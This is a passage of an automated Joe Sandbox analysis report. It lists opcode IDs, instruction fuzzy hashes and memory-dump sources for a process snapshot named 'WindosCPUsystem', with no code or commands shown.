                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 6b3323c878c9478e032e00c1bf1be5e6e7ba4f5f1197caadc54378f1b2e7d585
                                                                                                        • Instruction ID: 437b5e9fe4dc0971f9c47f63f7f085d09cb0af31cb9bf12ed6d9313dfaa1aa4e
                                                                                                        • Opcode Fuzzy Hash: 6b3323c878c9478e032e00c1bf1be5e6e7ba4f5f1197caadc54378f1b2e7d585
                                                                                                        • Instruction Fuzzy Hash: 6F111CB0D4D55E8FDFA8EF18C8596E9B7B1EB58300F0045FAC00DD3291CA385A818F55
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 85f4a0acd9325d5be57f54d7a1da374b5b77b705cedfe059ae5f00a93965ab99
                                                                                                        • Instruction ID: 2a90a91b8719d832d4be73bef95a1cc255a97ee0684871fa2c254783a2b894e6
                                                                                                        • Opcode Fuzzy Hash: 85f4a0acd9325d5be57f54d7a1da374b5b77b705cedfe059ae5f00a93965ab99
                                                                                                        • Instruction Fuzzy Hash: EC110C7080868D8FDF95EF68C858AA97BB0FF65341F0505AAE418D7291DB34D554CB41
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 571bcc5f27e87f6968c692fcb159b2612446e6531a2ff0e0503f62ee3a9ec73f
                                                                                                        • Instruction ID: 0495266aaf885a9283af1f359d560c413abe935494a257ef09deec0468b614e7
                                                                                                        • Opcode Fuzzy Hash: 571bcc5f27e87f6968c692fcb159b2612446e6531a2ff0e0503f62ee3a9ec73f
                                                                                                        • Instruction Fuzzy Hash: E611397080CA8D8FDF95EF68C858AAA7BB0FF29301F0505AAD408D71A2DB349994CB40
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f8df2250ca86a0872028096fabeb8c696517a44bf536bbc4bbe51f8212b53242
                                                                                                        • Instruction ID: 35f860eb066440034d0459394e23f7c1ca6fde9a37278b0559c21c1c85168c19
                                                                                                        • Opcode Fuzzy Hash: f8df2250ca86a0872028096fabeb8c696517a44bf536bbc4bbe51f8212b53242
                                                                                                        • Instruction Fuzzy Hash: 75018431A1C9494FEBA4FE6CE89577E72F9EF98394F10423DA04DC3292CE24E8018780
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 68b4781fed219fb2e06af42937d552f6a362f10b0582c05f49efe96bc75a1e53
                                                                                                        • Instruction ID: d480cf60cbd424ef9ed42b8f5329f90a24d8b31404770679f030bf670b655f17
                                                                                                        • Opcode Fuzzy Hash: 68b4781fed219fb2e06af42937d552f6a362f10b0582c05f49efe96bc75a1e53
                                                                                                        • Instruction Fuzzy Hash: 2B01177091464DCFDF84EF18C845AFD77E0FB28345F04056AA819D3294DB30EA54CB80
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: be7e37161ec4f4b1d9dc07c8a7f0679746f976d7ef7124b3725b7ed500892857
                                                                                                        • Instruction ID: 02ee70a331eafe4c4e8daee5e74544017d0929751e11f940e7ae67a3db796767
                                                                                                        • Opcode Fuzzy Hash: be7e37161ec4f4b1d9dc07c8a7f0679746f976d7ef7124b3725b7ed500892857
                                                                                                        • Instruction Fuzzy Hash: 7301A570918A4D9FDF94EF58C849AAE7BF0FB28305F10056AA41DD3290DB34E594CB80
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 1851fcb8e9acf5d58fcef1511795281540a9c83f1a32fb29d3ea841c080a4d1a
                                                                                                        • Instruction ID: b0ec249d115302cd0820c8e35838d83404e583f572842ef9aa5b9871341ac7ec
                                                                                                        • Opcode Fuzzy Hash: 1851fcb8e9acf5d58fcef1511795281540a9c83f1a32fb29d3ea841c080a4d1a
                                                                                                        • Instruction Fuzzy Hash: D901D67091894D9FDF94EF58C448ABE7BF4FB28301F10056AA429D3290DB34A590CB80
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d48612e41e4b5fe8ea793ab33cd89e4a9574d00aac742c1354240458684d433f
                                                                                                        • Instruction ID: 97e9dff72f4fa3e34a9529cf32be73dc097f170f2d8792675ff432f43b2a70a7
                                                                                                        • Opcode Fuzzy Hash: d48612e41e4b5fe8ea793ab33cd89e4a9574d00aac742c1354240458684d433f
                                                                                                        • Instruction Fuzzy Hash: 7F01D63080895D8FDF94EF68C448ABA7BF0FB68305F10056AA819D3290DB34A590CB80
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 38902ea0ae89e6e9e152a64f6d324e6594360de68268a0836c7ce9785ff1dabf
                                                                                                        • Instruction ID: ad8049ba4b150938772020213cf27bed3e3ead7a135922acc4c4130aa5bcd2c4
                                                                                                        • Opcode Fuzzy Hash: 38902ea0ae89e6e9e152a64f6d324e6594360de68268a0836c7ce9785ff1dabf
                                                                                                        • Instruction Fuzzy Hash: 9801D27080894EDFDF94EF58C848ABA7BF0FB28345F10456AA419D3294DB70A694CB80
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a3bb4ff6ea7e043f4746d5fb486d06222fd6f64d0c6c7d353841a392a52f029c
                                                                                                        • Instruction ID: 485a8204fbf8598b89ae762c5af3e8c475ab3b01b0fc1b87fb0dbef185e3f896
                                                                                                        • Opcode Fuzzy Hash: a3bb4ff6ea7e043f4746d5fb486d06222fd6f64d0c6c7d353841a392a52f029c
                                                                                                        • Instruction Fuzzy Hash: B301D67190894D8FDF94EF58C848ABA7BF0FB28301F50056AA419D3295DB70A690CB80
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a75aa315d97683bbc636fa5d6836e0070fdb2aaeb9b3bda6c9a4ea4e6e1b7fa7
                                                                                                        • Instruction ID: fcf1dca10fd7f14582bea506fd2793af340fb790a57d5cdb47b2e27de0d311b0
                                                                                                        • Opcode Fuzzy Hash: a75aa315d97683bbc636fa5d6836e0070fdb2aaeb9b3bda6c9a4ea4e6e1b7fa7
                                                                                                        • Instruction Fuzzy Hash: 8C01FB3080854DCFDF94EF58C844ABA77F4FB28345F10056AA419D3195DB70EA54DB80
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 41c9a7214340442ab6d1b636874531af6cff025a5373515e2be9d1e5cc4cf17f
                                                                                                        • Instruction ID: abde921732869d7e88439af8f0a50e22d98ecbcb2d6b029196e3bd9e67e18c72
                                                                                                        • Opcode Fuzzy Hash: 41c9a7214340442ab6d1b636874531af6cff025a5373515e2be9d1e5cc4cf17f
                                                                                                        • Instruction Fuzzy Hash: 60F0E73081894DCFDF95EF58C848ABEB7B4FF28305F04056AA41DD3294DB70A650CB40
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2763926675.00007FF849020000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849020000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff849020000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 70a3bfffc3da81dcc04ed74d90aca5ab5e67bb0abb28090cd7bf2e2711f83a62
                                                                                                        • Instruction ID: cd2e9673e013ad7f59933b4283c543efd261e244dbd9b9d13d237edbc88309f6
                                                                                                        • Opcode Fuzzy Hash: 70a3bfffc3da81dcc04ed74d90aca5ab5e67bb0abb28090cd7bf2e2711f83a62
                                                                                                        • Instruction Fuzzy Hash: 0701E470E1861E8EEF68EF64C4557AE77B1FF68344F5004B9C40CA3291DB38A981CB94
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9eb315cf09a8be664dc3dc9c8ce433b9f90b954108696a9e5a0d4247c5613be9
                                                                                                        • Instruction ID: 63fa33f763dc394554d8aa456cc5a86ed753db7e042fa80aeb9918d58710e64a
                                                                                                        • Opcode Fuzzy Hash: 9eb315cf09a8be664dc3dc9c8ce433b9f90b954108696a9e5a0d4247c5613be9
                                                                                                        • Instruction Fuzzy Hash: 25E04622B1CA090EB148B21C38430F973C2D789274B80027BE84EC22D7ED0A688300CA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2306649c735adc46ef2e33a6be36684d58a14cec9c9df69e5a87a9a10cb65ceb
                                                                                                        • Instruction ID: f9010333fa95ea400f53129d9d91a618a56a782e8fbcc55a42c6be3fa678b519
                                                                                                        • Opcode Fuzzy Hash: 2306649c735adc46ef2e33a6be36684d58a14cec9c9df69e5a87a9a10cb65ceb
                                                                                                        • Instruction Fuzzy Hash: E9E08673B4C5064EF618794C78831F8B3C1D78A2B0B40067BD58ECA5D7EC17644301CA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3fd8cabf8c562b71e167fc142b5dca8e3647bdc7318ada02041856956bbe7408
                                                                                                        • Instruction ID: 9a0d916409601d4d557cc68eab86bafe158528833453606fab41e8ed3954dd0f
                                                                                                        • Opcode Fuzzy Hash: 3fd8cabf8c562b71e167fc142b5dca8e3647bdc7318ada02041856956bbe7408
                                                                                                        • Instruction Fuzzy Hash: 25E0E51144F3E22FC3439778A8A24D67F309D0726870942E7D0C4CE093D60C554AC3A6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 7c9ad786969763d22a7885d09eb58e37a5514e84f19f8d428110b0113b133d13
                                                                                                        • Instruction ID: 39da6d49c5af7f17a5322e944c5a8cddacbf759aa97db05219d7de52bb034cd9
                                                                                                        • Opcode Fuzzy Hash: 7c9ad786969763d22a7885d09eb58e37a5514e84f19f8d428110b0113b133d13
                                                                                                        • Instruction Fuzzy Hash: F8E02631B1CA554EEB7826BE644C772A3C8EBA8369F00463AD008C2280D9BC98818B80
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: cd25092632d961d4413a513d02c8976acc4773871cb1abd99fec50a9eb6bb65a
                                                                                                        • Instruction ID: cd122f63ea479f7bc8a644e97b18008d07ad44e5b4f9ec679eee5283176789ae
                                                                                                        • Opcode Fuzzy Hash: cd25092632d961d4413a513d02c8976acc4773871cb1abd99fec50a9eb6bb65a
                                                                                                        • Instruction Fuzzy Hash: 71D01200F5C95E0EDDA87A7834151BD51C6CBC979078055B5E40DC628ADC1CDC420380
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e82a63731ebfef2ba25e8db5fd86ed7581b6fc0fd8f78c18b2c53c3cca0c4e20
                                                                                                        • Instruction ID: fc0fca35eaea06d81891435d961edf90f795e687d6cb165ae7512d7b640bc398
                                                                                                        • Opcode Fuzzy Hash: e82a63731ebfef2ba25e8db5fd86ed7581b6fc0fd8f78c18b2c53c3cca0c4e20
                                                                                                        • Instruction Fuzzy Hash: 37B09212B1D8190BA1A0668D3C821B8A281D788665B9801B3E008C228AD90A9D8202C6